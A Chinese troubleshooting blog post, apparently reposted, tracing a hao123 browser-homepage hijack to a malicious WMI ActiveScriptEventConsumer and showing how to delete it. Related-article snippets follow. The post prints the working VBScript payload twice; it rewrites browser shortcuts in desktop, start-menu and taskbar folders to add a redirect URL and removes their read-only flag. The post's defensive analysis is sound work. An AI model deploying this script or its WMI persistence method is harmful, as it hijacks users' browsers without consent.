解决hao123胁持chrome等浏览器主页问题
- 转自:http://xinghao.me/2016/03/01/2016-03-01-kill-hao123/
首先检查了一下chrome的主页设置,发现没有问题,依然是原来的google.com。
然后到chrome的安装目录,直接双击打开chrome程序,没有问题。
然后检查快捷方式。因为我把chrome固定到任务栏上,一般使用的时候都是点击任务栏图标的,而实际上这只是一个快捷方式。右键任务栏chrome图标->右键Google Chrome->属性,就会弹出该快捷方式的属性窗口。发现快捷方式的目标链接已经被修改,多加了一个启动参数:
1 |
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" http://hao.169x.cn/?v=108 |
而这个网址,打开之后就会重定向到hao123.com。
原因找出来了,出现主页被胁持的原因是系统里所有跟chrome有关的快捷方式都被修改,加了一个启动参数导致每次被启动时候都会跳转到这个网址。除了任务栏快捷方式之外,开始菜单中跟chrome有关的所有快捷方式都无一幸免。
修复尝试
定位出这个原因之后,结合网上的一些方法,进行了很多的尝试,最后也没有彻底解决:
手动删掉所有快捷方式中的启动参数。这个方法治标不治本,本来以为这样可以解决了,结果隔了一段时间,或者重启系统之后,所有快捷方式又会被恶意修改。
尝试了一下参考文章2的方法,但是找不到文中所说的注册表项和隐藏文件。
在注册表中搜索所有跟hao123相关的内容,然后删除,但是问题仍然存在。
用Everything搜索本地所有跟hao123相关的文件和文件夹,但是删除之后仍然没有解决问题。
最后找到了参考文章1的方法,但是在WMI event viewer中找不到文中所说的_EventFilter:Name=”unown_filter”
重装chrome,但是一段时间之后恶心的hao123又回来了
把所有chrome快捷方式设为只读,但是发现一段时间之后还是被恶意修改了
解决方法
经过这些头痛的尝试之后,决定先一步一步定位出原因,首先是要看一下到底是什么程序修改了chrome快捷方式。下载Process Monitor,菜单栏Filter->filter,在弹出的窗口中,把chrome的快捷方式路径添加到监视中:
注意这时候不要对chrome进行任何操作,包括打开、右键等等,以免造成干扰。监视一段时间之后,就会发现元凶露出了真面目:
就是这个叫scrcons.exe的程序在修改chrome快捷方式。
这时候发现定位出来的原因跟这篇文章中的原因是一样的,于是再次按照文中所说的方法,用WMI Event Viewer查看WMI事件。但仍然没有在root/subscription里面找到可疑项,最后几番查找,终于在root\CIMV2里面揪出了真凶。
首先打开WMI Event Viewer,点击左上角工具栏中的Register for Events按钮,默认就会连接到root\CIMV2,直接点确定即可。
然后在Consumer in root\CIMV2 -> _EventConsumer -> ActiveScriptEventConsumer下,找到了可疑项。
双击ActiveScriptEventConsumer.Name=”VBScriptKids_consumer”,弹出属性页面:
就会发现chrome快捷方式被修改的元凶 — ScriptText:
1 |
On Error Resume Next:Const link = "http://hao.169x.cn/?v=108":Const link360 = "http://hao.169x.cn/?v=108&s=3":browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe":lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs":browsersArr = split(browsers,","):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsersArr:oDic.Add LCase(browser), browser:Next:lnkpathsArr = split(lnkpaths,","):Set oFolders = CreateObject("scripting.dictionary"):For Each lnkpath In lnkpathsArr:oFolders.Add lnkpath, lnkpath:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):For Each oFolder In oFolders:If fso.FolderExists(oFolder) Then:For Each file In fso.GetFolder(oFolder).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:Set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:If LCase(name) = LCase("360se.exe") Then:oShellLink.Arguments = link360:Else:oShellLink.Arguments = link:End If:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:Next: |
这个脚本定期就会被系统调用一次,所以就算手动把快捷方式的参数清空,隔一段时间之后又会重新被改回来。
这也是很多流氓软件的常用招数,具体可以参考利用WMI打造完美“三无”后门。
恶意脚本分析
上面的VB脚本用冒号作为分隔符,把一段程序写成了一个语句,为了便于理解,把这段脚本重新排版了一下:
12345678910111213141516171819202122232425262728293031323334353637383940414243 |
On Error Resume NextConst link = "http://hao.169x.cn/?v=108"Const link360 = "http://hao.169x.cn/?v=108&s=3"browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe" lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\chenxh\Desktop,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\chenxh\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\chenxh\AppData\Roaming\Microsoft\Windows\Start Menu\Programs" browsersArr = split(browsers,",")Set oDic = CreateObject("scripting.dictionary") For Each browser In browsersArr oDic.Add LCase(browser), browserNext lnkpathsArr = split(lnkpaths,",") Set oFolders = CreateObject("scripting.dictionary") For Each lnkpath In lnkpathsArr oFolders.Add lnkpath, lnkpath Next Set fso = CreateObject("Scripting.Filesystemobject") Set WshShell = CreateObject("Wscript.Shell") For Each oFolder In oFolders If fso.FolderExists(oFolder) Then For Each file In fso.GetFolder(oFolder).Files If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then Set oShellLink = WshShell.CreateShortcut(file.Path) path = oShellLink.TargetPath name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path) If oDic.Exists(LCase(name)) Then If LCase(name) = LCase("360se.exe") Then oShellLink.Arguments = link360 Else oShellLink.Arguments = link End If If file.Attributes And 1 Then file.Attributes = file.Attributes - 1 End If oShellLink.Save End If End If Next End If Next |
可以看到,这段脚本就是遍历所有快捷方式目录(linkpaths)下的所有浏览器(browsers)的快捷方式,然后重新给快捷方式加上启动参数。
这时,我们只需要在WMI event里把 _EventConsumer 删除,右键删除,如果权限不足,去文件夹下右键管理员启动WMI Event。上述所用到的工具均可百度搜索到。
转载于:https://www.cnblogs.com/moweijie-mdeveloper/p/7026363.html
解决hao123胁持chrome等浏览器主页问题相关推荐
- 彻底解决不要脸的360更改浏览器主页
周末将电脑借给同事使用了,回来发现浏览器主页被360更改了,下面说说怎么解决 1.IE浏览器/工具/internet选项 把主页更改了(基本没用) 2.右键浏览器图标/属性/快捷方式/目标 ...
- 关于如何解决360篡改edge等浏览器主页的解决方案
博主发现edge的某些打开方式,点击后主页出现360的情况,自己也是大为恼火,遂bing,按照网上方法设置多次无果. 解决方式:针对电脑上下载360全家桶的用户. 右键点击360安全卫士桌面快捷方式, ...
- 解决hao123劫持chrome主页问题
近两天隔一段时间打开chrome,主页就被加载到hao123,发现桌面快捷方式指向的目标后面带了一串"小尾巴".排查了注册表和chrome主页设置,都没问题,判断可能是被劫持了.于 ...
- 解决联想电脑上Microsoft Edge浏览器主页锁定hao123无法更改的问题
我的联想电脑重装系统后发现,Microsoft Edge浏览器的主页一直锁定在hao123的首页,且更改完网址后,再次打开Edge还是显示hao123. 查找了一下原因,发现是自家的联想电脑管家锁定了 ...
- 彻底解决不要脸的360更改浏览器主页【转载】
1.IE浏览器/工具/internet选项 把主页更改了(基本没用) 2.右键浏览器图标/属性/快捷方式/目标 看看是不是在.exe后面有没有指向360的目标,有的话删掉.如果不能更改 ...
- 最简单的解决Chrome浏览器主页被hao123、360和2345篡改的方法是什么
最简单的解决Chrome浏览器主页被hao123.360和2345篡改的方法是什么 参考文章: (1)最简单的解决Chrome浏览器主页被hao123.360和2345篡改的方法是什么 (2)http ...
- Google Chrome、ie、世界之窗、火狐等浏览器主页被hao123绑架解决办法
浏览器主页被hao123绑架有多种原因,目前我发现的有两种: 一.在一些网站或网盘(如百度网盘)下载了一些流氓软件,在电脑上安装后,在"任务管理器"中发现多了一个"Brm ...
- Chrome,IE等浏览器主页被hao123等篡改的解决方法
概述:今天自己装了一个破解版的软件,然后我电脑上所有浏览器主页都被篡改了,不管是chrome,IE,搜狗全部中招.MD Fuck,忍不了啊,上网搜解决方法.然后一步一步试吧.最后问题解决了,但是在网上 ...
- 解决计算机被暴风集火(jihuo)后留下的IE,chrome,火狐等所有浏览器主页网址携带有”tn=93453552_hao_pg“后缀的驱动类木马病毒的问题
产生原因 下载了有木马病毒的软件 脱离了计算机杀毒软件以及防火墙的保护 先了解木马病毒是什么 木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件.发送密码.记录键盘和攻击D ...
最新文章
- echarts中graphic_使用Pyecharts进行奥运会可视化分析!
- POJ 3461 KMP
- delphi pdf 转换 html5,Delphi使用Word ActiveX将doc转换为pdf
- json数组显示格式
- OpenCV相交凸intersectConvex的实例(附完整代码)
- Windows_API_函数 参考大全
- FE助手 json格式化 reslet client
- matlab数字仿真实验,DVR+备用电源自动投入的MATLAB数字仿真实验仿真实验
- 互联网晚报 | 1月29日 星期六 | 支付宝相互宝正式关停;大钲资本成瑞幸咖啡实控人;苹果创有史以来最高单季营收...
- BLIP:用更干净更多样的数据进行多模态预训练,性能超越CLIP!代码已开源!...
- [实践项目]Udacity self-driving-car-sim
- CentOS7镜像下载地址
- python画球员传球图_Python实现NBA投篮数据可视化!看看球星们的投篮热点
- 魔兽世界6.2.2德拉诺怎么飞行 wow飞行成就获得方法
- 华三交换机升级的ipe文件_H3C 交换机升级说明
- java.lang.NoClassDefFoundError: Could not initialize class找不类的问题
- returned a response status of 405 Method Not Allowed
- Opencv---通过形态学操作提取水平和垂直线
- 继承(extends)
- html怎么查看cad文件,怎么将电脑CAD文件在手机上查看?原来怎么简单!
热门文章
- ubuntu常见指令
- 三路合并 —— Git 学习笔记 17
- 深度增强学习前沿算法思想
- android-6.0不支持FloatMath.sqrt(x * x + y * y)
- python string.format()_Python string.format()百分比,不取整
- JZOJ 5602. 【NOI2018模拟3.26】Cti JZOJ 5057. 【GDSOI2017模拟4.13】炮塔
- JZOJ 5434. 【NOIP2017提高A组集训10.30】Matrix
- JZOJ 100030. 【NOIP2017提高A组模拟7.8】为了爱情
- vectorvn1610报价_【8.5873.5444.G323】价格_厂家 - 中国供应商
- mathematica 可编辑pdf_Mathematica学习笔记[1]